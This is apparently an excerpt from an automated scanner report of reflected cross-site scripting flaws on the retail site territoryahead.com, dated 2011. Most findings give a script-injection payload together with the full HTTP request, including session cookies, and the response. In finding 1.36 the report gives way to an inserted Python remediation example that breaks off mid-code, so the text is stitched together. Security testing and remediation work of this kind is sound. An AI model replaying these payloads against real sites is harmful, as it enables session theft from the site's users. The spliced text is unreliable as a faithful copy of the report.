1.24. http://www.territoryahead.com/menu/milonic_src.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /menu/milonic_src.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 57d86--><script>alert(1)</script>dbe9b3c16fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/milonic_src.js57d86--><script>alert(1)</script>dbe9b3c16fb HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:25:31 GMT
Server: Apache
ETag: "AAAAS53+sGo"
Last-Modified: Wed, 02 Mar 2011 19:10:45 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
kie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 4Ex5C6wSrSgAAGQksboAAAAa
REDIRECT_SCRIPT_URL: /menu/milonic_src.js57d86--><script>alert(1)</script>dbe9b3c16fb
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu/milonic_src.js57d86-->
...[SNIP]...

1.25. http://www.territoryahead.com/menu/mmenudom.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /menu/mmenudom.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cc17--><script>alert(1)</script>f66506f27e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu7cc17--><script>alert(1)</script>f66506f27e5/mmenudom.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:16:57 GMT
Server: Apache
ETag: "AAAAS53+0mk"
Last-Modified: Wed, 02 Mar 2011 19:11:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wbGP7qwSrRQAAA17c1gAAAAf
REDIRECT_SCRIPT_URL: /menu7cc17--><script>alert(1)</script>f66506f27e5/mmenudom.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu7cc17-->
...[SNIP]...

1.26. http://www.territoryahead.com/menu/mmenudom.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /menu/mmenudom.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fdcb5--><script>alert(1)</script>6b6b99bd582 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/mmenudom.jsfdcb5--><script>alert(1)</script>6b6b99bd582 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:16:59 GMT
Server: Apache
ETag: "AAAAS53+1IM"
Last-Modified: Wed, 02 Mar 2011 19:11:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wdJq@qwSrRQAAHAHEa8AAAAv
REDIRECT_SCRIPT_URL: /menu/mmenudom.jsfdcb5--><script>alert(1)</script>6b6b99bd582
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/menu/mmenudom.jsfdcb5-->
...[SNIP]...

1.27. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d79c9--><script>alert(1)</script>d1e96091030 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shoppingd79c9--><script>alert(1)</script>d1e96091030/mercado/style/searchResults.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:04 GMT
Server: Apache
ETag: "AAAAS53/7WT"
Last-Modified: Wed, 02 Mar 2011 19:16:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62382010; Path=/; Expires=Wed, 16-Mar-2011 19:16:09 GMT
Set-Cookie: customer=92645757; Path=/; Expires=Thu, 28-Feb-2019 19:16:09 GMT
Set-Cookie: mmlID=68410305; Path=/; Expires=Thu, 28-Feb-2019 19:16:09 GMT
Set-Cookie: JSESSIONID=bTr7Zg1Rbv26; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
_UNIQUE_ID: xatD-KwSrRQAABCSmtgAAAAM
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shoppingd79c9--><script>alert(1)</script>d1e96091030/mercado/style/searchResults.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shoppingd79c9-->
...[SNIP]...

1.28. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b1fca--><script>alert(1)</script>f6e066f6d1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopping/mercadob1fca--><script>alert(1)</script>f6e066f6d1a/style/searchResults.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:21 GMT
Server: Apache
ETag: "AAAAS53/HE6"
Last-Modified: Wed, 02 Mar 2011 19:12:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381931; Path=/; Expires=Wed, 16-Mar-2011 19:12:35 GMT
Set-Cookie: customer=92646105; Path=/; Expires=Thu, 28-Feb-2019 19:12:35 GMT
Set-Cookie: mmlID=68410503; Path=/; Expires=Thu, 28-Feb-2019 19:12:35 GMT
Set-Cookie: JSESSIONID=eZKXaLc4KYb9; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ID: 5uIku6wSrSgAAD2OI4MAAAAn
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shopping/mercadob1fca--><script>alert(1)</script>f6e066f6d1a/style/searchResults.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shopping/mercadob1fca-->
...[SNIP]...

1.29. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 31895--><script>alert(1)</script>c76e908cfde was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopping/mercado/style31895--><script>alert(1)</script>c76e908cfde/searchResults.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:17 GMT
Server: Apache
ETag: "AAAAS53/+iP"
Last-Modified: Wed, 02 Mar 2011 19:16:23 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62382043; Path=/; Expires=Wed, 16-Mar-2011 19:16:22 GMT
Set-Cookie: customer=92645790; Path=/; Expires=Thu, 28-Feb-2019 19:16:22 GMT
Set-Cookie: mmlID=68410338; Path=/; Expires=Thu, 28-Feb-2019 19:16:22 GMT
Set-Cookie: JSESSIONID=bfs4vpOyb6ub; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
IHq6wSrRQAAE0b@voAAAAe
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shopping/mercado/style31895--><script>alert(1)</script>c76e908cfde/searchResults.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shopping/mercado/style31895-->
...[SNIP]...

1.30. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /shopping/mercado/style/searchResults.css

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 65309--><script>alert(1)</script>4a214804e75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shopping/mercado/style/searchResults.css65309--><script>alert(1)</script>4a214804e75 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:33 GMT
Server: Apache
ETag: "AAAAS54AAh8"
Last-Modified: Wed, 02 Mar 2011 19:16:31 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62382071; Path=/; Expires=Wed, 16-Mar-2011 19:16:31 GMT
Set-Cookie: customer=92646318; Path=/; Expires=Thu, 28-Feb-2019 19:16:31 GMT
Set-Cookie: mmlID=68410366; Path=/; Expires=Thu, 28-Feb-2019 19:16:31 GMT
Set-Cookie: JSESSIONID=bLREHBcbm_H8; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
AAAR
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /shopping/mercado/style/searchResults.css65309--><script>alert(1)</script>4a214804e75
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/shopping/mercado/style/searchResults.css65309-->
...[SNIP]...

1.31. http://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 40fb8--><script>alert(1)</script>003ed39f7ff869e3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates40fb8--><script>alert(1)</script>003ed39f7ff869e3c/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Mar 2011 18:52:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n: Keep-Alive
Connection: Keep-Alive
UNIQUE_ID: aTsLyawSrSgAAFLsEqIAAAEV
nokeepalive: 1
ssl-unclean-shutdown: 1
downgrade-1.0: 1
force-response-1.0: 1
SCRIPT_URL: /templates40fb8--><script>alert(1)</script>003ed39f7ff869e3c/custservcontactus.jsp
SCRIPT_URI: http://www.territoryahead.com/templates40fb8-->
...[SNIP]...

1.32. http://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f90f1--><script>alert(1)</script>a2b2eaaefe415af6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jspf90f1--><script>alert(1)</script>a2b2eaaefe415af6c?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:43:05 GMT
Server: Apache
ETag: "AAAAS5334A8"
Last-Modified: Wed, 02 Mar 2011 18:40:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
AAFjZAcYAAADU
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /templates/custservcontactus.jspf90f1--><script>alert(1)</script>a2b2eaaefe415af6c
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/templates/custservcontactus.jspf90f1-->
...[SNIP]...

1.33. http://www.territoryahead.com/templates/custservcontactus.jsp [itemID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 45a90--><script>alert(1)</script>43dd353bdf3a7be2f was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=23645a90--><script>alert(1)</script>43dd353bdf3a7be2f&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:52:07 GMT
Server: Apache
ETag: "AAAAS5332VB"
Last-Modified: Wed, 02 Mar 2011 18:40:52 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
om/errorhandler.jsp?ruleID=8&ruleID=145&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=145&itemID=23645a90--><script>alert(1)</script>43dd353bdf3a7be2f&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: aTtg_UkbQc6f (from cookie)

Parameters:
submit.y = 13
submit.y = 13
ruleID
...[SNIP]...

1.34. http://www.territoryahead.com/templates/custservcontactus.jsp [itemType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the itemType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831c1"><script>alert(1)</script>458d6a39f0728d841 was submitted in the itemType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY831c1"><script>alert(1)</script>458d6a39f0728d841&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:43:00 GMT
Server: Apache
ETag: "AAAAS5332tx"
Last-Modified: Wed, 02 Mar 2011 18:40:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY831c1"><script>alert(1)</script>458d6a39f0728d841&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.35. http://www.territoryahead.com/templates/custservcontactus.jsp [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the path request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7fa"><script>alert(1)</script>e1e7dc8b031f72cf was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2367e7fa"><script>alert(1)</script>e1e7dc8b031f72cf&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:52:09 GMT
Server: Apache
ETag: "AAAAS53322A"
Last-Modified: Wed, 02 Mar 2011 18:40:54 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2367e7fa"><script>alert(1)</script>e1e7dc8b031f72cf&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.36. http://www.territoryahead.com/templates/custservcontactus.jsp [ruleID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /templates/custservcontactus.jsp

Issue detail

The value of the ruleID request parameter is copied into an HTML comment. The payload 5b8e8--><script>alert(1)</script>5080cc77d69cd4dfb was submitted in the ruleID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
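The remediation note above, repeated for every comment-context finding in this report, and the attribute-context findings 1.34 and 1.35 describe two distinct output-encoding failures: request data written into an HTML comment without removing the sequence that closes a comment, and request data written into a double-quoted attribute value without encoding the quote. The Python below is an added example, not code from the report or from the site, that models both output points on constructed input (the REDIRECT_* variable names, the payloads and the form action are copied from the report's snippets; the rendering functions and the oracle are this example's own) and applies the context-specific encoding that closes each hole. The oracle uses the standard library's HTML parser to count live script elements, which is the property a fix has to change: a fix that merely hides alert(1) while leaving a parsable script element in place is not a fix.

```python
import html
import re
from html.parser import HTMLParser

# Payloads quoted in findings 1.25 (comment context) and 1.34 (attribute context).
COMMENT_PAYLOAD = "7cc17--><script>alert(1)</script>f66506f27e5"
ATTR_PAYLOAD = '831c1"><script>alert(1)</script>458d6a39f0728d841'


def encode_for_html_comment(value: str) -> str:
    """Make untrusted text safe to write inside <!-- ... -->.

    Browsers do not decode entity references inside comments, so encoding here is not
    about display: it guarantees that the byte sequences that terminate a comment
    ('-->' and '--!>') cannot be formed. Replacing every '-', '<', '>' and '&' with a
    numeric character reference achieves that and keeps the text readable.
    """
    return re.sub(r"[-<>&]", lambda m: f"&#{ord(m.group(0))};", value)


def encode_for_attribute(value: str) -> str:
    """Make untrusted text safe inside a quoted attribute value (both quote kinds covered)."""
    return html.escape(value, quote=True)


def render_debug_comment(env: dict, safe: bool) -> str:
    """Model of the error page in the report, which dumps CGI variables into an HTML comment.
    safe=False reproduces the flaw; safe=True applies comment-context encoding to each value."""
    enc = encode_for_html_comment if safe else (lambda v: v)
    lines = "\n".join(f"{name}: {enc(value)}" for name, value in env.items())
    return f"<!--\n{lines}\n-->"


def render_form(query_string: str, safe: bool) -> str:
    """Model of the contact form whose action attribute echoes the request's query string."""
    enc = encode_for_attribute if safe else (lambda v: v)
    return (f'<form action="/templates/custservcontactus.jsp?{enc(query_string)}" '
            'method="post" name="form1">')


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a tolerant HTML parser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag == "script":
            self.count += 1


def live_script_elements(markup: str) -> int:
    """Oracle for the fix: text that stays inside a comment or an attribute value yields 0."""
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.count


def demo() -> dict:
    # Constructed inputs: the REDIRECT_* names and the query string mirror the report's snippets.
    env = {
        "REDIRECT_UNIQUE_ID": "constructed",
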